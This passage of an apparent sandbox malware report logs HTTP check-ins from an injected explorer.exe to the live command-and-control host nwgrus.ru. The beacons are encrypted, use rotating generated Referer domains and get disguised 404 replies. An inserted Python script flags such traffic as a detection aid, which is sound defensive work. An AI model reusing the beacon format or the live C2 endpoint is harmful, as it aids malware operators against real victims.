                                                                      Sep 25, 2024 16:01:49.339195013 CEST | 279 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 7c 52 c6 e6
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu|RZBDPf`)q3mMY+hvq)X8}BJP~/Z5bwY@]f5w?e!tTVf-v:WT4:1C8
                                                                      Sep 25, 2024 16:01:50.595983982 CEST | 137 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:50 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      16 | 192.168.2.5 | 49727 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:01:50.603841066 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://edyhjfoqqme.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 200
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:50.603859901 CEST | 200 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 3c 49 d5 9c
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu<IQnv~.1oi(E>}~0@$QCZ>/V.,1B!,=z`|jN.
                                                                      Sep 25, 2024 16:01:51.860969067 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:51 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      17 | 192.168.2.5 | 49728 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:01:51.873326063 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ecpbasxejvhmni.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 173
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:51.873358011 CEST | 173 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 30 02 a0 ae
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu0o[c:/ Oe9rhkws1<(N0{SU&d1/
                                                                      Sep 25, 2024 16:01:53.130346060 CEST | 137 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:52 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      18 | 192.168.2.5 | 49729 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:01:53.138679028 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://pklhudfcrpsm.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 303
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:53.138693094 CEST | 303 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 6e 57 e2 fb
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vunWe[fv\N5y9X?FJ5\\:$,P}"]>~&;8H[33xT+yKm'z~Vp4]vv%Ld
                                                                      Sep 25, 2024 16:01:54.403583050 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:54 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      19 | 192.168.2.5 | 49730 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:01:54.420666933 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://bwdwojspdgtrj.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 166
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:54.420680046 CEST | 166 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 35 57 d5 f9
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu5W~[rDmkpRES^ak[\)9-P1\d7){{
                                                                      Sep 25, 2024 16:01:55.668787956 CEST | 189 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:55 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                                                                      Data Ascii: #\6Y9l_m=rA
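The sessions above all have one shape: PID 1028 (explorer.exe, the process the sample injected into) POSTs to nwgrus.ru/tmp/index.php with an Internet Explorer 11 User-Agent, a Referer naming a different pseudo-random domain on every request, a Content-Type of application/x-www-form-urlencoded over a body that is plainly ciphertext (every captured body begins with the same bytes 3b 6e 22 10 f7 be ...), and the server answers with a 404 whose body is Apache's ErrorDocument template even though its Server header says nginx/1.26.0. The two 200 OK replies (sessions 15 and 17) are 137 bytes, i.e. headers only, and the 404 in session 19 carries a 45-byte body that is not HTML. The following is an added example, not code from the report or from Joe Sandbox: it parses request/response pairs built from the captured headers and body prefixes above and reports which of those traits each pair shows. The indicator names, the 0.7 printable-byte threshold and the consonant-run rule for generated-looking domains are this example's own assumptions, and the benign control request (host www.example.com, a Firefox process path) is constructed.

```python
"""Indicators for the SmokeLoader-style check-ins captured above (sessions 12-22).
Added example, not code from the Joe Sandbox report. Samples are built from the report's
own headers and body prefixes; indicator names and thresholds are this example's own."""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

STATIC_BODY_PREFIX = bytes.fromhex("3b6e2210f7be1b27d8aeb501")  # leads every POST body above
CONSONANT_RUN = re.compile(r"[bcdfghjklmnpqrstvwxyz]+")

@dataclass
class HttpExchange:
    process: str  # owning process, as in the report's Process column
    req_line: str
    req_headers: dict
    req_body: bytes
    status_line: str
    resp_headers: dict
    resp_body: bytes

def parse_http(raw: bytes):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def build_exchange(process, raw_req, raw_resp):
    return HttpExchange(process, *parse_http(raw_req), *parse_http(raw_resp))

def printable_ratio(data: bytes) -> float:
    """Share of printable-ASCII/whitespace bytes; near 1.0 for real form data or HTML."""
    return 1.0 if not data else sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / len(data)

def hostname(value: str) -> str:
    """Host part of a URL or of a bare Host header value, lower-cased."""
    return (urlparse(value if "://" in value else "//" + value).hostname or "").lower()

def smokeloader_indicators(ex: HttpExchange) -> list:
    """Names of the indicators an exchange triggers; an empty list means nothing matched."""
    hits = []
    method = ex.req_line.split(" ")[0]
    host = hostname(ex.req_headers.get("host", ""))
    referer = hostname(ex.req_headers.get("referer", ""))
    # explorer.exe has no business POSTing to a web server; here it is the injected host.
    if method == "POST" and ex.process.lower().endswith("\\explorer.exe"):
        hits.append("explorer_post")
    # The Referer changes on every request and never names the Host it is sent to.
    if referer and referer != host:
        hits.append("referer_host_mismatch")
    # Labels such as ktflshoikbglbj: long, with a run of 4+ consonants (crude DGA check).
    label = referer.split(".")[-2] if "." in referer else referer
    longest = max((len(m) for m in CONSONANT_RUN.findall(label)), default=0)
    if len(label) >= 10 and longest >= 4:
        hits.append("dga_like_referer")
    # Content-Type claims form encoding, but the body is ciphertext.
    ctype = ex.req_headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded") and printable_ratio(ex.req_body) < 0.7:
        hits.append("binary_form_body")
    # The same leading ciphertext bytes on every check-in (fixed key and plaintext header).
    if ex.req_body.startswith(STATIC_BODY_PREFIX):
        hits.append("static_body_prefix")
    # Server says nginx, yet the 404 page is Apache's ErrorDocument template.
    if ex.resp_headers.get("server", "").lower().startswith("nginx") and b"ErrorDocument" in ex.resp_body:
        hits.append("apache_404_from_nginx")
    # A 404 whose text/html body is not text: the real reply hidden inside an error page.
    status = ex.status_line.split(" ")[1] if " " in ex.status_line else ""
    if status == "404" and ex.resp_body and printable_ratio(ex.resp_body) < 0.7:
        hits.append("binary_404_body")
    return hits

# Constructed samples, taken from the sessions above (bodies cut to their captured prefix).
def c2_request(referer: bytes, body: bytes) -> bytes:
    return (b"POST /tmp/index.php HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nReferer: " + referer
            + b"\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) "
            b"like Gecko\r\nHost: nwgrus.ru\r\n\r\n" + body)

NGINX_HDRS = b"Server: nginx/1.26.0\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\n\r\n"
EXPLORER = "C:\\Windows\\explorer.exe"
# Session 13: first 40 body bytes; reply is the (trimmed) Apache-style fake 404 page.
FAKE_404 = build_exchange(EXPLORER, c2_request(b"http://ktflshoikbglbj.net/", bytes.fromhex(
    "3b6e2210f7be1b27d8aeb50175060fcb787fcee0690691120c787f9144b3c21e9f2dce28061d2b19")),
    b"HTTP/1.1 404 Not Found\r\n" + NGINX_HDRS + b"<title>404 Not Found</title><p>Additionally, a 404 Not "
    b"Found error was encountered while trying to use an ErrorDocument to handle the request.</p>")
# Session 19: same request shape, but the 404 carries a 45-byte non-HTML body (the real C2 reply).
BINARY_404 = build_exchange(EXPLORER, c2_request(b"http://bwdwojspdgtrj.net/", STATIC_BODY_PREFIX),
    b"HTTP/1.1 404 Not Found\r\n" + NGINX_HDRS + bytes.fromhex(
    "0000d880d7bd9dd9a198be23cdc58881998b5c36593908a56c5fb5ac17bdcfb4fe6d9f3dd4a1720a41c28f97cb"))
# Control (constructed): an ordinary browser request whose Referer matches the Host.
BENIGN = build_exchange("C:\\Program Files\\Mozilla Firefox\\firefox.exe",
    b"GET /news HTTP/1.1\r\nHost: www.example.com\r\nReferer: https://www.example.com/\r\n\r\n",
    b"HTTP/1.1 200 OK\r\n" + NGINX_HDRS + b"<html><body><h1>News</h1></body></html>")

if __name__ == "__main__":
    for name, ex in ("session 13", FAKE_404), ("session 19", BINARY_404), ("benign", BENIGN):
        print(f"{name}: {smokeloader_indicators(ex) or 'clean'}")
```

Run it over request/response pairs carved from a PCAP or proxy log. The apache_404_from_nginx and binary_404_body indicators are specific enough to alert on by themselves; the Referer mismatch and the consonant-run rule also fire on some legitimate traffic and are better used to raise the score of a flow that already has the process and body indicators.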


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      20 | 192.168.2.5 | 49732 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:01:57.194613934 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://otxnyveihviep.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 257
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:57.194637060 CEST | 257 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 18 6b 2c 90 f4 76 0b 75 3d 4f f3 ad
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA ,[k,vu=OGj\^]5'[|b}U0h%tQ&U@IK[f]au5B%%JuDFL?CpICZp??3!4i
                                                                      Sep 25, 2024 16:01:58.462407112 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:58 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      21 | 192.168.2.5 | 49733 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:01:58.471280098 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://btdksbvigeadnr.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 160
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:58.471318007 CEST | 160 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 57 2f c9 ed
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vuW/x!{r?u\<_, bT!kEx?S_42IbU^&(E
                                                                      Sep 25, 2024 16:01:59.728923082 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:59 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      22 | 192.168.2.5 | 49735 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:01:59.737637997 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://xwykiojnclenqqi.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 116
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:59.737658978 CEST | 116 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 4e 38 c2 95
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vuN8!a^{D'Y
                                                                      Sep 25, 2024 16:02:01.002402067 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:02:00 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      23 | 192.168.2.5 | 49736 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:02:01.058787107 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://nhtxkrllcfsfts.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 275
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:02:01.059075117 CEST | 275 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 28 01 b0 f4
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu(X@NCk+4a"hW;(DL"#BJ4^(b7_1{8p76/KO.tl$[OgI6(8
                                                                      Sep 25, 2024 16:02:02.506156921 CEST | 137 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:02:02 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


